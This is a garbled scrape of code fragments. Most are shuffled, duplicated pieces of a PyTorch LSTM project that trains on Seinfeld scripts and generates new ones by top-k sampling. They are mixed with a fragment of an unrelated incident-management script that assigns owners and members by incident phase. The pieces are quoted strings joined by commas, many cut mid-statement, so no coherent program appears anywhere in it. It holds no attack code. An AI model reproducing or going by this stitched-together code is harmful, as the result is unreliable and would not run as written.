p.cpu() #", "with some element of randomness p = p.numpy().squeeze() word_i = np.random.choice(top_i, p=p/p.sum()) #", "= nn.Dropout(dropout) def forward(self, nn_input, hidden): \"\"\" Forward propagation of the neural network", "self.dropout(x) x = self.fc(x) x = x.view(batch_size, -1, self.output_size) x = x[:, -1]", "neural network :param decoder: The PyTorch Module that holds the neural network :param", "the prime_id current_seq = np.full((1, sequence_length), pad_value) current_seq[-1][-1] = prime_id predicted = [int_to_vocab[prime_id]]", "class variables self.output_size = output_size self.n_layers = n_layers self.hidden_dim = hidden_dim # define", "hidden state :return: hidden state of dims (n_layers, batch_size, hidden_dim) ''' # Implement", "= torch.cuda.is_available() if not train_on_gpu: print('No GPU found. 
Please use a GPU to", "'./data/Seinfeld_Scripts.txt' text = helper.load_data(data_dir) # Check for a GPU train_on_gpu = torch.cuda.is_available() if", "[int_to_vocab[prime_id]] for _ in range(predict_len): if train_on_gpu: current_seq = torch.LongTensor(current_seq).cuda() else: current_seq =", "RNN(vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5) if train_on_gpu: rnn.cuda() # defining loss and", "output, _ = rnn(current_seq, hidden) # get the next word probabilities p =", "of the rnn output, _ = rnn(current_seq, hidden) # get the next word", "set class variables self.output_size = output_size self.n_layers = n_layers self.hidden_dim = hidden_dim #", "= vocab_size # Embedding Dimension embedding_dim = 128 # Hidden Dimension hidden_dim =", "of an LSTM/GRU :param batch_size: The batch_size of the hidden state :return: hidden", "embedding_dim, hidden_dim, n_layers, dropout=0.5): \"\"\" Initialize the PyTorch RNN Module :param vocab_size: The", "'||EXCLAMATION_MARK||', '?': '||QUESTION_MARK||', '(': '||LEFT_PAREN>||', ')': '||RIGHT_PAREN||', '-': '||DASH||', '\\n': '||RETURN||', } helper.preprocess_and_save_data(data_dir,", "Length sequence_length = 8 # of words in a sequence # Batch Size", "of the neural network :param nn_input: The input to the neural network :param", "the rnn output, _ = rnn(current_seq, hidden) # get the next word probabilities", "all the sentences return gen_sentences # run the cell multiple times to get", "n_layers, dropout=0.5): \"\"\" Initialize the PyTorch RNN Module :param vocab_size: The number of", "= p.cpu() # move to cpu # use top_k sampling to get the", "x = self.embedding(nn_input) x,h = self.lstm(x, hidden) x = x.contiguous().view(-1, self.hidden_dim) # x", "= helper.load_data(data_dir) # Check for a GPU train_on_gpu = torch.cuda.is_available() if not train_on_gpu:", "text to generate :return: The generated text \"\"\" rnn.eval() # create a sequence", "for vocabulary :param text: The text of tv scripts split into words :return:", "values :param pad_value: The value used to pad a sequence :param predict_len: The", "train your neural network.') def create_lookup_tables(text): \"\"\" Create lookup tables for vocabulary :param", "\"\"\" Generate a dict to turn punctuation into a token. :return: Tokenized dictionary", "dict to turn punctuation into a token. 
# load in data
import helper
import numpy as np
import torch
import torch.nn as nn
from string import punctuation
from collections import Counter
from torch.utils.data import TensorDataset, DataLoader

data_dir = './data/Seinfeld_Scripts.txt'
text = helper.load_data(data_dir)

# Check for a GPU
train_on_gpu = torch.cuda.is_available()
if not train_on_gpu:
    print('No GPU found. Please use a GPU to train your neural network.')


def create_lookup_tables(text):
    """
    Create lookup tables for vocabulary
    :param text: The text of tv scripts split into words
    :return: A tuple of dicts (vocab_to_int, int_to_vocab)
    """
    word_counts = Counter(text)
    sorted_vocab = sorted(word_counts, key=word_counts.get, reverse=True)
    int_to_vocab = {ii: word for ii, word in enumerate(sorted_vocab)}
    vocab_to_int = {word: ii for ii, word in int_to_vocab.items()}
    return vocab_to_int, int_to_vocab
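# Quick sanity check (illustrative only): ids are assigned by descending
# frequency, so the most common word should map to id 0.
_demo_v2i, _demo_i2v = create_lookup_tables(['the', 'cat', 'the'])
assert _demo_v2i['the'] == 0 and _demo_i2v[0] == 'the'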
def token_lookup():
    """
    Generate a dict to turn punctuation into a token.
    :return: Tokenized dictionary where the key is the punctuation and the value is the token
    """
    return {
        '.': '||PERIOD||',
        ',': '||COMMA||',
        '"': '||QUOTATION_MARK||',
        ';': '||SEMICOLON||',
        '!': '||EXCLAMATION_MARK||',
        '?': '||QUESTION_MARK||',
        '(': '||LEFT_PAREN||',
        ')': '||RIGHT_PAREN||',
        '-': '||DASH||',
        '\n': '||RETURN||',
    }


helper.preprocess_and_save_data(data_dir, token_lookup, create_lookup_tables)
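# Sketch of how preprocess_and_save_data is assumed to use token_lookup():
# surrounding each symbol's token with spaces makes punctuation its own
# "word" under a plain str.split(). The real logic lives in the project's
# helper module; this demo only illustrates the idea.
def _demo_tokenize(line, tokens=token_lookup()):
    for symbol, token in tokens.items():
        line = line.replace(symbol, ' {} '.format(token))
    return line.split()

print(_demo_tokenize('hello, world!'))
# ['hello', '||COMMA||', 'world', '||EXCLAMATION_MARK||']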
def batch_data(words, sequence_length, batch_size):
    """
    Batch the neural network data using DataLoader
    :param words: The word ids of the TV scripts
    :param sequence_length: The sequence length of each batch
    :param batch_size: The size of each batch; the number of sequences in a batch
    :return: DataLoader with batched data
    """
    n_batches = len(words)//batch_size
    words = words[:n_batches*batch_size]
    features = []
    targets = []
    total = len(words)-sequence_length
    for idx in range(0, total):
        x = words[idx:idx+sequence_length]
        features.append(x)
        y = words[idx+sequence_length]
        targets.append(y)
    train_x = np.array(features)
    train_y = np.array(targets)
    train_data = TensorDataset(torch.from_numpy(train_x), torch.from_numpy(train_y))
    train_loader = DataLoader(train_data, shuffle=False, batch_size=batch_size)
    # return a dataloader
    return train_loader
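# Shape check on toy ids (any integers work here; the real input is int_text):
_demo_loader = batch_data(list(range(50)), sequence_length=4, batch_size=8)
_demo_x, _demo_y = next(iter(_demo_loader))
print(_demo_x.shape, _demo_y.shape)  # torch.Size([8, 4]) torch.Size([8])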
int_text, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()
print(token_dict)
print(int_text[:10])
print(list(vocab_to_int.values())[:10])
print(list(int_to_vocab.values())[:10])


class RNN(nn.Module):
    def __init__(self, vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5):
        """
        Initialize the PyTorch RNN Module
        :param vocab_size: The number of input dimensions of the neural network (the size of the vocabulary)
        :param output_size: The number of output dimensions of the neural network
        :param embedding_dim: The size of embeddings, should you choose to use them
        :param hidden_dim: The size of the hidden layer outputs
        :param dropout: dropout to add in between LSTM/GRU layers
        """
        super(RNN, self).__init__()
        # set class variables
        self.output_size = output_size
        self.n_layers = n_layers
        self.hidden_dim = hidden_dim
        # define model layers
        self.embedding = nn.Embedding(vocab_size, embedding_dim)
        self.lstm = nn.LSTM(embedding_dim, hidden_dim, n_layers, dropout=dropout, batch_first=True)
        self.fc = nn.Linear(hidden_dim, output_size)
        self.dropout = nn.Dropout(dropout)

    def forward(self, nn_input, hidden):
        """
        Forward propagation of the neural network
        :param nn_input: The input to the neural network
        :param hidden: The hidden state
        :return: Two Tensors, the output of the neural network and the latest hidden state
        """
        batch_size = nn_input.size(0)
        x = self.embedding(nn_input)
        x, h = self.lstm(x, hidden)
        x = x.contiguous().view(-1, self.hidden_dim)
        # x = self.dropout(x)
        x = self.fc(x)
        x = x.view(batch_size, -1, self.output_size)
        # keep only the scores for the last time step of each sequence
        x = x[:, -1]
        # return one batch of output word scores and the hidden state
        return x, h

    def init_hidden(self, batch_size):
        """
        Initialize the hidden state of an LSTM/GRU
        :param batch_size: The batch_size of the hidden state
        :return: hidden state of dims (n_layers, batch_size, hidden_dim)
        """
        weight = next(self.parameters()).data
        if train_on_gpu:
            hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda(),
                      weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda())
        else:
            hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(),
                      weight.new(self.n_layers, batch_size, self.hidden_dim).zero_())
        return hidden
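# Minimal shape check for the RNN module (toy sizes, not the training config):
# the output should be one score per vocabulary word for each sequence in the batch.
_toy_rnn = RNN(vocab_size=10, output_size=10, embedding_dim=4, hidden_dim=6, n_layers=2)
_toy_input = torch.zeros(3, 5, dtype=torch.long)
if train_on_gpu:
    _toy_rnn.cuda()
    _toy_input = _toy_input.cuda()
_toy_hidden = _toy_rnn.init_hidden(3)
_toy_output, _toy_hidden = _toy_rnn(_toy_input, _toy_hidden)
print(_toy_output.shape)  # torch.Size([3, 10])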
def forward_back_prop(rnn, optimizer, criterion, inp, target, hidden):
    """
    Forward and backward propagation on the neural network
    :param rnn: The PyTorch Module that holds the neural network
    :param optimizer: The PyTorch optimizer for the neural network
    :param criterion: The PyTorch loss function
    :param inp: A batch of input to the neural network
    :param target: The target output for the batch of input
    :param hidden: The hidden state
    :return: The loss and the latest hidden state Tensor
    """
    # move data to GPU, if available
    if train_on_gpu:
        inp, target = inp.cuda(), target.cuda()
    # detach the hidden state from the previous batch's graph, then
    # perform backpropagation and optimization
    h = tuple([each.data for each in hidden])
    rnn.zero_grad()
    output, h = rnn(inp, h)
    loss = criterion(output, target)
    loss.backward()
    nn.utils.clip_grad_norm_(rnn.parameters(), 5)
    optimizer.step()
    # return the loss over a batch and the hidden state produced by our model
    return loss.item(), h


def train_rnn(rnn, batch_size, optimizer, criterion, n_epochs, show_every_n_batches=100):
    batch_losses = []
    rnn.train()
    print("Training for %d epoch(s)..." % n_epochs)
    for epoch_i in range(1, n_epochs + 1):
        # initialize hidden state
        hidden = rnn.init_hidden(batch_size)
        for batch_i, (inputs, labels) in enumerate(train_loader, 1):
            # make sure you iterate over completely full batches, only
            n_batches = len(train_loader.dataset)//batch_size
            if batch_i > n_batches:
                break
            # forward, back prop
            loss, hidden = forward_back_prop(rnn, optimizer, criterion, inputs, labels, hidden)
            # record loss
            batch_losses.append(loss)
            # printing loss stats
            if batch_i % show_every_n_batches == 0:
                print('Epoch: {:>4}/{:<4}  Loss: {}\n'.format(
                    epoch_i, n_epochs, np.average(batch_losses)))
                batch_losses = []
    # returns a trained rnn
    return rnn
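# Note: `tuple([each.data for each in hidden])` above implements truncated
# backpropagation through time by cutting the hidden state's link to the
# previous batch's graph. The more explicit modern spelling, assumed
# equivalent here, would be:
#     h = tuple(each.detach() for each in hidden)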
# Data params
# Sequence Length
sequence_length = 8  # of words in a sequence
# Batch Size
batch_size = 100

# data loader - do not change
train_loader = batch_data(int_text, sequence_length, batch_size)

# Training parameters
# Number of Epochs
num_epochs = 5
# Learning Rate
learning_rate = 0.001

# Model parameters
# Vocab size
vocab_size = len(vocab_to_int)
# Output size
output_size = vocab_size
# Embedding Dimension
embedding_dim = 128
# Hidden Dimension
hidden_dim = 512
# Number of RNN Layers
n_layers = 2
# Show stats for every n number of batches
show_every_n_batches = 500

# create model and move to gpu if available
rnn = RNN(vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5)
if train_on_gpu:
    rnn.cuda()

# defining loss and optimization functions for training
optimizer = torch.optim.Adam(rnn.parameters(), lr=learning_rate)
criterion = nn.CrossEntropyLoss()

# training the model
trained_rnn = train_rnn(rnn, batch_size, optimizer, criterion, num_epochs, show_every_n_batches)

# saving the trained model
helper.save_model('./trained_tv_script', trained_rnn)
print('Model Trained and Saved')

_, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()
trained_rnn = helper.load_model('./trained_tv_script')
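# helper.save_model/load_model ship with the project; a minimal sketch of
# what they are assumed to do (whole-module serialization with a .pt suffix):
#     torch.save(trained_rnn, './trained_tv_script.pt')
#     trained_rnn = torch.load('./trained_tv_script.pt')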
"= (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda()) else: hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(),", "the batch of input :return: The loss and the latest hidden state Tensor", "your neural network.') def create_lookup_tables(text): \"\"\" Create lookup tables for vocabulary :param text:", "% n_epochs) for epoch_i in range(1, n_epochs + 1): # initialize hidden state", "Initialize the PyTorch RNN Module :param vocab_size: The number of input dimensions of", "hidden) # record loss batch_losses.append(loss) # printing loss stats if batch_i % show_every_n_batches", "Learning Rate learning_rate = 0.001 # Model parameters # Vocab size vocab_size =", "int_to_vocab, token_dict = helper.load_preprocess() print(token_dict) print(int_text[:10]) print(list(vocab_to_int.values())[:10]) print(list(int_to_vocab.values())[:10]) class RNN(nn.Module): def __init__(self, vocab_size,", "of batches show_every_n_batches = 500 # create model and move to gpu if", "loader - do not change train_loader = batch_data(int_text, sequence_length, batch_size) # Training parameters", "word in int_to_vocab.items()} return vocab_to_int, int_to_vocab def token_lookup(): \"\"\" Generate a dict to", "output of the neural network and the latest hidden state \"\"\" batch_size =", ":return: The loss and the latest hidden state Tensor \"\"\" # move data", "each batch; the number of sequences in a batch :return: DataLoader with batched", "# Training parameters # Number of Epochs num_epochs = 5 # Learning Rate", "printing loss stats if batch_i % show_every_n_batches == 0: print('Epoch: {:>4}/{:<4} Loss: {}\\n'.format(", "loss and the latest hidden state Tensor \"\"\" # move data to GPU,", "# Embedding Dimension embedding_dim = 128 # Hidden Dimension hidden_dim = 512 #", "def generate(rnn, prime_id, int_to_vocab, token_dict, pad_value, predict_len=100): \"\"\" Generate text using the neural", ":param prime_id: The word id to start the first prediction :param int_to_vocab: Dict", "= 512 # Number of RNN Layers n_layers = 2 # Show stats", "load in data import helper import numpy as np import torch import torch.nn", "The size of the hidden layer outputs :param dropout: dropout to add in", ":return: Two Tensors, the output of the neural network and the latest hidden", "# run the cell multiple times to get different results! gen_length = 400", "of input dimensions of the neural network (the size of the vocabulary) :param", "the neural network data using DataLoader :param words: The word ids of the", "stats if batch_i % show_every_n_batches == 0: print('Epoch: {:>4}/{:<4} Loss: {}\\n'.format( epoch_i, n_epochs,", "# Hidden Dimension hidden_dim = 512 # Number of RNN Layers n_layers =", "saving the trained model helper.save_model('./trained_tv_script', trained_rnn) print('Model Trained and Saved') _, vocab_to_int, int_to_vocab,", "into a token. 
:return: Tokenized dictionary where the key is the punctuation and", "Tensor \"\"\" # move data to GPU, if available if train_on_gpu: inp, target", "hidden = forward_back_prop(rnn, optimizer, criterion, inputs, labels, hidden) # record loss batch_losses.append(loss) #", "hidden): \"\"\" Forward and backward propagation on the neural network :param decoder: The", "create a sequence (batch_size=1) with the prime_id current_seq = np.full((1, sequence_length), pad_value) current_seq[-1][-1]", "= self.lstm(x, hidden) x = x.contiguous().view(-1, self.hidden_dim) # x = self.dropout(x) x =", "= TensorDataset(torch.from_numpy(train_x), torch.from_numpy(train_y)) train_loader = DataLoader(train_data, shuffle=False, batch_size=batch_size) # return a dataloader return", "# create a sequence (batch_size=1) with the prime_id current_seq = np.full((1, sequence_length), pad_value)", "LSTM/GRU :param batch_size: The batch_size of the hidden state :return: hidden state of", "produced by our model return loss.item(), h def train_rnn(rnn, batch_size, optimizer, criterion, n_epochs,", "ANYTHING IN THIS CELL THAT IS BELOW THIS LINE \"\"\" pad_word = helper.SPECIAL_WORDS['PADDING']", "The word id to start the first prediction :param int_to_vocab: Dict of word", "(vocab_to_int, int_to_vocab) \"\"\" word_counts = Counter(text) sorted_vocab = sorted(word_counts, key=word_counts.get, reverse=True) int_to_vocab =", ":param vocab_size: The number of input dimensions of the neural network (the size", "'||DASH||', '\\n': '||RETURN||', } helper.preprocess_and_save_data(data_dir, token_lookup, create_lookup_tables) def batch_data(words, sequence_length, batch_size): \"\"\" Batch", "128 # Hidden Dimension hidden_dim = 512 # Number of RNN Layers n_layers", "in token_dict.items(): ending = ' ' if key in ['\\n', '(', '\"'] else", "variables self.output_size = output_size self.n_layers = n_layers self.hidden_dim = hidden_dim # define model", "batch_losses.append(loss) # printing loss stats if batch_i % show_every_n_batches == 0: print('Epoch: {:>4}/{:<4}", "function weight = next(self.parameters()).data if (train_on_gpu): hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda(), weight.new(self.n_layers, batch_size,", "total = len(words)-sequence_length for idx in range(0, total): x = words[idx:idx+sequence_length] features.append(x) y", "+ 1): # initialize hidden state hidden = rnn.init_hidden(batch_size) for batch_i, (inputs, labels)", "Dict of word id keys to word values :param token_dict: Dict of puncuation", "current_seq[-1][-1] = prime_id predicted = [int_to_vocab[prime_id]] for _ in range(predict_len): if train_on_gpu: current_seq", "hidden state of an LSTM/GRU :param batch_size: The batch_size of the hidden state", "key in ['\\n', '(', '\"'] else '' gen_sentences = gen_sentences.replace(' ' + token.lower(),", "if(batch_i > n_batches): break # forward, back prop loss, hidden = forward_back_prop(rnn, optimizer,", "sequence length of each batch :param batch_size: The size of each batch; the", "dropout to add in between LSTM/GRU layers \"\"\" super(RNN, self).__init__() # set class", "= 0.001 # Model parameters # Vocab size vocab_size = len(vocab_to_int) # Output", "batch_size, self.hidden_dim).zero_().cuda()) else: hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_()) return hidden", "TV scripts :param sequence_length: The sequence length of each batch :param batch_size: The", "token_lookup(): \"\"\" Generate a dict 
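# Standalone illustration of the top_k sampling step above, on a toy
# distribution (the real `p` comes from F.softmax over vocabulary scores):
_toy_p = torch.tensor([[0.05, 0.40, 0.12, 0.30, 0.05, 0.08]])
_toy_p, _toy_i = _toy_p.topk(3)
_toy_p, _toy_i = _toy_p.numpy().squeeze(), _toy_i.numpy().squeeze()
print(np.random.choice(_toy_i, p=_toy_p/_toy_p.sum()))  # one of ids 1, 3, or 2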
# run the cell multiple times to get different results!
gen_length = 400  # modify the length to your preference
prime_word = 'jerry'  # name for starting the script

"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
pad_word = helper.SPECIAL_WORDS['PADDING']
generated_script = generate(trained_rnn, vocab_to_int[prime_word + ':'],
                            int_to_vocab, token_dict, vocab_to_int[pad_word], gen_length)
The PyTorch", "becomes the next \"current sequence\" and the cycle can continue current_seq = np.roll(current_seq,", "word id keys to word values :param token_dict: Dict of puncuation tokens keys", "= np.random.choice(top_i, p=p/p.sum()) # retrieve that word from the dictionary word = int_to_vocab[word_i]", "from torch.utils.data import TensorDataset, DataLoader data_dir = './data/Seinfeld_Scripts.txt' text = helper.load_data(data_dir) # Check", "the TV scripts :param sequence_length: The sequence length of each batch :param batch_size:", "is the punctuation and the value is the token \"\"\" return { '.':", "output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5): \"\"\" Initialize the PyTorch RNN Module :param vocab_size:", "gpu if available rnn = RNN(vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5) if train_on_gpu:", "ii, word in int_to_vocab.items()} return vocab_to_int, int_to_vocab def token_lookup(): \"\"\" Generate a dict", "5 # Learning Rate learning_rate = 0.001 # Model parameters # Vocab size", "hidden_dim: The size of the hidden layer outputs :param dropout: dropout to add", "on the neural network :param decoder: The PyTorch Module that holds the neural", "= top_i.numpy().squeeze() # select the likely next word index with some element of", "\"\"\" Initialize the PyTorch RNN Module :param vocab_size: The number of input dimensions", "state hidden = rnn.init_hidden(batch_size) for batch_i, (inputs, labels) in enumerate(train_loader, 1): # make", "loss.item(), h def train_rnn(rnn, batch_size, optimizer, criterion, n_epochs, show_every_n_batches=100): batch_losses = [] rnn.train()", "word top_k = 5 p, top_i = p.topk(top_k) top_i = top_i.numpy().squeeze() # select", "= len(words)-sequence_length for idx in range(0, total): x = words[idx:idx+sequence_length] features.append(x) y =", "token_dict = helper.load_preprocess() trained_rnn = helper.load_model('./trained_tv_script') import torch.nn.functional as F def generate(rnn, prime_id,", "the output of the rnn output, _ = rnn(current_seq, hidden) # get the", "text of tv scripts split into words :return: A tuple of dicts (vocab_to_int,", "initialize hidden state hidden = rnn.init_hidden(batch_size) for batch_i, (inputs, labels) in enumerate(train_loader, 1):", "words[idx:idx+sequence_length] features.append(x) y = words[idx+sequence_length] targets.append(y) train_x = np.array(features) train_y = np.array(targets) train_data", "400 # modify the length to your preference prime_word = 'jerry' # name", "of randomness p = p.numpy().squeeze() word_i = np.random.choice(top_i, p=p/p.sum()) # retrieve that word", "train_x = np.array(features) train_y = np.array(targets) train_data = TensorDataset(torch.from_numpy(train_x), torch.from_numpy(train_y)) train_loader = DataLoader(train_data,", "create_lookup_tables) def batch_data(words, sequence_length, batch_size): \"\"\" Batch the neural network data using DataLoader", "= p.topk(top_k) top_i = top_i.numpy().squeeze() # select the likely next word index with", "data using DataLoader :param words: The word ids of the TV scripts :param", "= self.fc(x) x = x.view(batch_size, -1, self.output_size) x = x[:, -1] # return", "and the hidden state produced by our model return loss.item(), h def train_rnn(rnn,", "total): x = words[idx:idx+sequence_length] features.append(x) y = words[idx+sequence_length] targets.append(y) train_x = np.array(features) train_y", "hidden state Tensor \"\"\" # move data to GPU, if available if train_on_gpu:", "nn.Embedding(vocab_size, 
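# A minimal sanity check for batch_data, assuming the definition above is in
# scope. The toy values (50 word ids, sequence_length=5, batch_size=10) are
# illustrative only, not the training configuration used later.
test_loader = batch_data(list(range(50)), sequence_length=5, batch_size=10)
sample_x, sample_y = next(iter(test_loader))
print(sample_x.shape)            # torch.Size([10, 5]) -> 10 sequences of 5 word ids
print(sample_y.shape)            # torch.Size([10])    -> one target id per sequence
print(sample_x[0], sample_y[0])  # ids [0, 1, 2, 3, 4] predict 5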
class RNN(nn.Module):
    def __init__(self, vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5):
        """
        Initialize the PyTorch RNN Module
        :param vocab_size: The number of input dimensions of the neural network (the size of the vocabulary)
        :param output_size: The number of output dimensions of the neural network
        :param embedding_dim: The size of embeddings, should you choose to use them
        :param hidden_dim: The size of the hidden layer outputs
        :param dropout: dropout to add in between LSTM/GRU layers
        """
        super(RNN, self).__init__()
        # set class variables
        self.output_size = output_size
        self.n_layers = n_layers
        self.hidden_dim = hidden_dim
        # define model layers
        self.embedding = nn.Embedding(vocab_size, embedding_dim)
        self.lstm = nn.LSTM(embedding_dim, hidden_dim, n_layers, dropout=dropout, batch_first=True)
        self.fc = nn.Linear(hidden_dim, output_size)
        self.dropout = nn.Dropout(dropout)

    def forward(self, nn_input, hidden):
        """
        Forward propagation of the neural network
        :param nn_input: The input to the neural network
        :param hidden: The hidden state
        :return: Two Tensors, the output of the neural network and the latest hidden state
        """
        batch_size = nn_input.size(0)
        x = self.embedding(nn_input)
        x, h = self.lstm(x, hidden)
        x = x.contiguous().view(-1, self.hidden_dim)
        # x = self.dropout(x)
        x = self.fc(x)
        x = x.view(batch_size, -1, self.output_size)
        x = x[:, -1]
        # return one batch of output word scores and the hidden state
        return x, h

    def init_hidden(self, batch_size):
        '''
        Initialize the hidden state of an LSTM/GRU
        :param batch_size: The batch_size of the hidden state
        :return: hidden state of dims (n_layers, batch_size, hidden_dim)
        '''
        # Implement function
        weight = next(self.parameters()).data
        if train_on_gpu:
            hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda(),
                      weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda())
        else:
            hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(),
                      weight.new(self.n_layers, batch_size, self.hidden_dim).zero_())
        return hidden


def forward_back_prop(rnn, optimizer, criterion, inp, target, hidden):
    """
    Forward and backward propagation on the neural network
    :param rnn: The PyTorch Module that holds the neural network
    :param optimizer: The PyTorch optimizer for the neural network
    :param criterion: The PyTorch loss function
    :param inp: A batch of input to the neural network
    :param target: The target output for the batch of input
    :return: The loss and the latest hidden state Tensor
    """
    # move data to GPU, if available
    if train_on_gpu:
        inp, target = inp.cuda(), target.cuda()
    # detach the hidden state from its history, then perform backpropagation and optimization
    h = tuple([each.data for each in hidden])
    rnn.zero_grad()
    output, h = rnn(inp, h)
    loss = criterion(output, target)
    loss.backward()
    nn.utils.clip_grad_norm_(rnn.parameters(), 5)
    optimizer.step()
    # return the loss over a batch and the hidden state produced by our model
    return loss.item(), h


def train_rnn(rnn, batch_size, optimizer, criterion, n_epochs, show_every_n_batches=100):
    batch_losses = []
    rnn.train()
    for epoch_i in range(1, n_epochs + 1):
        # initialize hidden state
        hidden = rnn.init_hidden(batch_size)
        for batch_i, (inputs, labels) in enumerate(train_loader, 1):
            # make sure you iterate over completely full batches, only
            n_batches = len(train_loader.dataset)//batch_size
            if batch_i > n_batches:
                break
            # forward, back prop
            loss, hidden = forward_back_prop(rnn, optimizer, criterion, inputs, labels, hidden)
            # record loss
            batch_losses.append(loss)
            # printing loss stats
            if batch_i % show_every_n_batches == 0:
                print('Epoch: {:>4}/{:<4} Loss: {}\n'.format(
                    epoch_i, n_epochs, np.average(batch_losses)))
                batch_losses = []
    # returns a trained rnn
    return rnn
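# A quick shape check for the model (illustrative values; assumes the RNN class
# and the module-level train_on_gpu flag defined above are in scope).
tiny_rnn = RNN(vocab_size=20, output_size=20, embedding_dim=8, hidden_dim=16, n_layers=2)
h0 = tiny_rnn.init_hidden(batch_size=4)
x = torch.randint(0, 20, (4, 5))  # a batch of 4 sequences, 5 word ids each
scores, h1 = tiny_rnn(x, h0)
print(scores.shape)  # torch.Size([4, 20]): one score per vocabulary word, for the
                     # *next* word only, since forward() keeps just the last time step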
# Data params
# Sequence Length
sequence_length = 8  # of words in a sequence
# Batch Size
batch_size = 100
# data loader - do not change
train_loader = batch_data(int_text, sequence_length, batch_size)

# Training parameters
# Number of Epochs
num_epochs = 5
# Learning Rate
learning_rate = 0.001

# Model parameters
# Vocab size
vocab_size = len(vocab_to_int)
# Output size
output_size = vocab_size
# Embedding Dimension
embedding_dim = 128
# Hidden Dimension
hidden_dim = 512
# Number of RNN Layers
n_layers = 2
# Show stats for every n number of batches
show_every_n_batches = 500

# create model and move to gpu if available
rnn = RNN(vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5)
if train_on_gpu:
    rnn.cuda()

# defining loss and optimization functions for training
optimizer = torch.optim.Adam(rnn.parameters(), lr=learning_rate)
criterion = nn.CrossEntropyLoss()

# training the model
trained_rnn = train_rnn(rnn, batch_size, optimizer, criterion, num_epochs, show_every_n_batches)

# saving the trained model
helper.save_model('./trained_tv_script', trained_rnn)
print('Model Trained and Saved')

_, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()
trained_rnn = helper.load_model('./trained_tv_script')

import torch.nn.functional as F


def generate(rnn, prime_id, int_to_vocab, token_dict, pad_value, predict_len=100):
    """
    Generate text using the neural network
    :param rnn: The PyTorch Module that holds the trained neural network
    :param prime_id: The word id to start the first prediction
    :param int_to_vocab: Dict of word id keys to word values
    :param token_dict: Dict of punctuation tokens keys to punctuation values
    :param pad_value: The value used to pad a sequence
    :param predict_len: The length of text to generate
    :return: The generated text
    """
    rnn.eval()
    # create a sequence (batch_size=1) with the prime_id
    current_seq = np.full((1, sequence_length), pad_value)
    current_seq[-1][-1] = prime_id
    predicted = [int_to_vocab[prime_id]]
    for _ in range(predict_len):
        if train_on_gpu:
            current_seq = torch.LongTensor(current_seq).cuda()
        else:
            current_seq = torch.LongTensor(current_seq)
        # initialize the hidden state
        hidden = rnn.init_hidden(current_seq.size(0))
        # get the output of the rnn
        output, _ = rnn(current_seq, hidden)
        # get the next word probabilities
        p = F.softmax(output, dim=1).data
        if train_on_gpu:
            p = p.cpu()  # move to cpu
        # use top_k sampling to get the index of the next word
        top_k = 5
        p, top_i = p.topk(top_k)
        top_i = top_i.numpy().squeeze()
        # select the likely next word index with some element of randomness
        p = p.numpy().squeeze()
        word_i = np.random.choice(top_i, p=p/p.sum())
        # retrieve that word from the dictionary
        word = int_to_vocab[word_i]
        predicted.append(word)
        # the generated word becomes the next "current sequence" and the cycle can continue
        current_seq = np.roll(current_seq, -1, 1)
        current_seq[-1][-1] = word_i
    gen_sentences = ' '.join(predicted)
    # Replace punctuation tokens
    for key, token in token_dict.items():
        ending = ' ' if key in ['\n', '(', '"'] else ''
        gen_sentences = gen_sentences.replace(' ' + token.lower(), key)
    gen_sentences = gen_sentences.replace('\n ', '\n')
    gen_sentences = gen_sentences.replace('( ', '(')
    # return all the sentences
    return gen_sentences


# run the cell multiple times to get different results!
gen_length = 400  # modify the length to your preference
prime_word = 'jerry'  # name for starting the script

"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
pad_word = helper.SPECIAL_WORDS['PADDING']
generated_script = generate(trained_rnn, vocab_to_int[prime_word + ':'], int_to_vocab,
                            token_dict, vocab_to_int[pad_word], gen_length)
                            # last two args restored from the definitions above
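# Standalone illustration of the top_k sampling step inside generate() above,
# using a fake score vector in place of real model output.
fake_scores = torch.tensor([[2.0, 1.0, 0.5, 0.1, -1.0, -2.0]])
p = F.softmax(fake_scores, dim=1).data
p, top_i = p.topk(5)                           # keep the 5 most likely word ids
p, top_i = p.numpy().squeeze(), top_i.numpy().squeeze()
word_i = np.random.choice(top_i, p=p/p.sum())  # renormalize and sample one of them
print(top_i, word_i)                           # e.g. [0 1 2 3 4] 0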
[ "the existing list (which would remove members)! if incident.phase_id == 'Phase_Name': incident.members =", "list of members can include multiple groups and individual users. # NOTE: #", "phase changes. # Phase is a select field with API name `phase_id`, #", "to the incident. # The list of members can include multiple groups and", "as Incident Owner. # NOTE: # When you change the owner of an", "name `phase_id`, # so the tests below are written as # if incident.phase_id", "current phase name, add members to the incident. # The list of members", "the previous owner is removed, # but also automatically added to Members so", "phase name, add members to the incident. # The list of members can", "and individual users. # NOTE: # Here we **add** the new members to", "are written as # if incident.phase_id == \"value\": # Based on the current", "# The list of members can include multiple groups and individual users. #", "2020. All Rights Reserved. # Script to set incident owner and members based", "members based on Incident Phase. # To be run when the phase changes.", "select field with API name `phase_id`, # so the tests below are written", "incident.phase_id == \"value\": # Based on the current phase name, set a single", "User as Incident Owner. # NOTE: # When you change the owner of", "set incident owner and members based on Incident Phase. # To be run", "the current phase name, set a single Group or User as Incident Owner.", "or User as Incident Owner. # NOTE: # When you change the owner", "list, # don't just overwrite the existing list (which would remove members)! if", "NOTE: # When you 